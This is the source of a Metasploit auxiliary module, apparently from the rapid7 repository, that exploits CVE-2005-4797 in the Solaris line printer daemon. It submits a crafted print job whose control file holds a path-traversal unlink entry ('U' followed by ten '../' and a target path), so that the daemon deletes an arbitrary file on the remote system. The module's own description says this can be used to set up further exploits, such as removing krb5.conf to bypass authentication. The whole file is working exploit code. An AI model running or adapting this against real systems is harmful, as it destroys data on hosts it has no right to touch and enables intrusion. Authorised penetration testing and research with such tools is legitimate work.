GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'English'
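class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Solaris LPD cascaded-job arbitrary file delete (CVE-2005-4797).
  #
  # A print job is submitted whose control file carries a "U" (unlink)
  # entry that escapes the spool directory; the daemon removes the named
  # file with its own privileges when it cleans the job up.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Solaris LPD Arbitrary File Delete',
        'Description' => %q{
          This module uses a vulnerability in the Solaris line printer
          daemon to delete arbitrary files on an affected system. This
          can be used to exploit the rpc.walld format string flaw, the
          missing krb5.conf authentication bypass, or simply delete
          system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
        },
        'Author' => [ 'hdm', 'Optyx <optyx[at]uberhax0r.net>' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-4797' ],
          [ 'BID', '14510' ],
          [ 'OSVDB', '18650' ]
        ],
        'Notes' => {
          'Stability' => [SERVICE_RESOURCE_LOSS],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(515),
        # Interpreted relative to the spool directory after ten "../"
        # components, so both "etc/krb5.conf" and "/etc/krb5.conf" work.
        OptString.new('RPATH', [ true, 'The remote file path to delete']),
      ]
    )
  end

  # Submits one cascaded LPD job whose control file contains an unlink
  # entry for RPATH. Every step is acknowledged by the daemon with a
  # single NUL byte; any other reply aborts the run.
  #
  # NOTE(review): the daemon only acknowledges that the job was *accepted*.
  # Nothing in the protocol exchange confirms the unlink itself, so the
  # "Successfully deleted" line below means "job accepted", not "file
  # verified gone". Confirm removal out of band if it matters.
  def run
    rpath = datastore['RPATH'].to_s

    # The control file is newline-delimited and the U entry is NUL-terminated
    # below, so either character inside RPATH would corrupt the job.
    if rpath.empty? || rpath.include?("\n") || rpath.include?("\x00")
      fail_with(Failure::BadConfig, 'RPATH must be non-empty and must not contain newline or NUL bytes')
    end

    r_hostname = Rex::Text.rand_text_alpha(1..8)
    r_user = Rex::Text.rand_text_alpha(1..8)
    r_spool = Rex::Text.rand_text_alpha(1..8)

    # Minimal control file: H = originating host, P = requesting user.
    control = "H#{r_hostname}\nP#{r_user}\n"

    # The job ID is squashed down to three decimal digits (zero-padded so
    # small PIDs still give exactly three); the hex timestamp keeps job
    # file names distinct between runs.
    jid = format('%03d', $PROCESS_ID % 1000) + [Time.now.to_i].pack('N').unpack('H*')[0]

    # Establish the first connection to the server. global=false keeps the
    # socket out of self.sock; we close it ourselves on every exit path.
    sock1 = connect(false)
    begin
      # 0x02 = "receive a printer job" for the (bogus) queue host:spool.
      sock1.put("\x02#{r_hostname}:#{r_spool}\n")
      res = sock1.get_once
      unless res
        print_status('The target did not accept our job request command')
        return
      end

      # Theoretically, we could delete multiple files at once, however
      # the lp daemon will append garbage from memory to the path name
      # if we don't stick a null byte after the path. Unfortunately, this
      # null byte will prevent the parser from processing the other paths.
      # The ten "../" walk from the spool directory up to "/"; a leading
      # slash in RPATH is harmless because "..//etc" resolves like "../etc".
      control << 'U' + ('../' * 10) + "#{rpath}\x00\n"

      # The data file content is never printed, any bytes will do. (The
      # previous `rand_text_alpha(100) + 1` added an Integer to a String,
      # which raises TypeError before the files are ever sent.)
      dataf = Rex::Text.rand_text_alpha(100)

      print_status("Deleting #{rpath}...")
      uploaded = send_file(sock1, 2, 'cfA' + jid + r_hostname, control) &&
                 send_file(sock1, 3, 'dfa' + jid + r_hostname, dataf)
      # send_file has already reported which step the daemon rejected.
      return unless uploaded

      print_good("Successfully deleted #{rpath} >:-]")
    ensure
      sock1.close
    end
  end

  # Uploads one job file over an already-open LPD connection.
  #
  # @param sock [Rex::Socket] connected LPD socket
  # @param type [Integer] subcommand byte, 2 = control file, 3 = data file
  # @param name [String] file name presented to the daemon (cfA.../dfa...)
  # @param data [String] file contents
  # @return [true, nil] true when both the announcement and the payload were
  #   ACKed with a NUL byte; nil otherwise (the failure is printed here)
  def send_file(sock, type, name, data = '')
    # "<type><length> <name>\n" announces the file. The length must be the
    # byte count actually sent, hence bytesize rather than character length.
    sock.put(type.chr + data.bytesize.to_s + ' ' + name + "\n")
    res = sock.get_once(1)
    unless res && res[0] == "\0"
      print_status("The target did not accept our control file command (#{name})")
      return
    end

    # Payload, then a terminating NUL which the daemon ACKs with another NUL.
    sock.put(data)
    sock.put("\x00")
    res = sock.get_once(1)
    unless res && res[0] == "\0"
      print_status("The target did not accept our control file data (#{name})")
      return
    end

    print_status(format(' Uploaded %.4d bytes >> %s', data.bytesize, name))
    true
  end
end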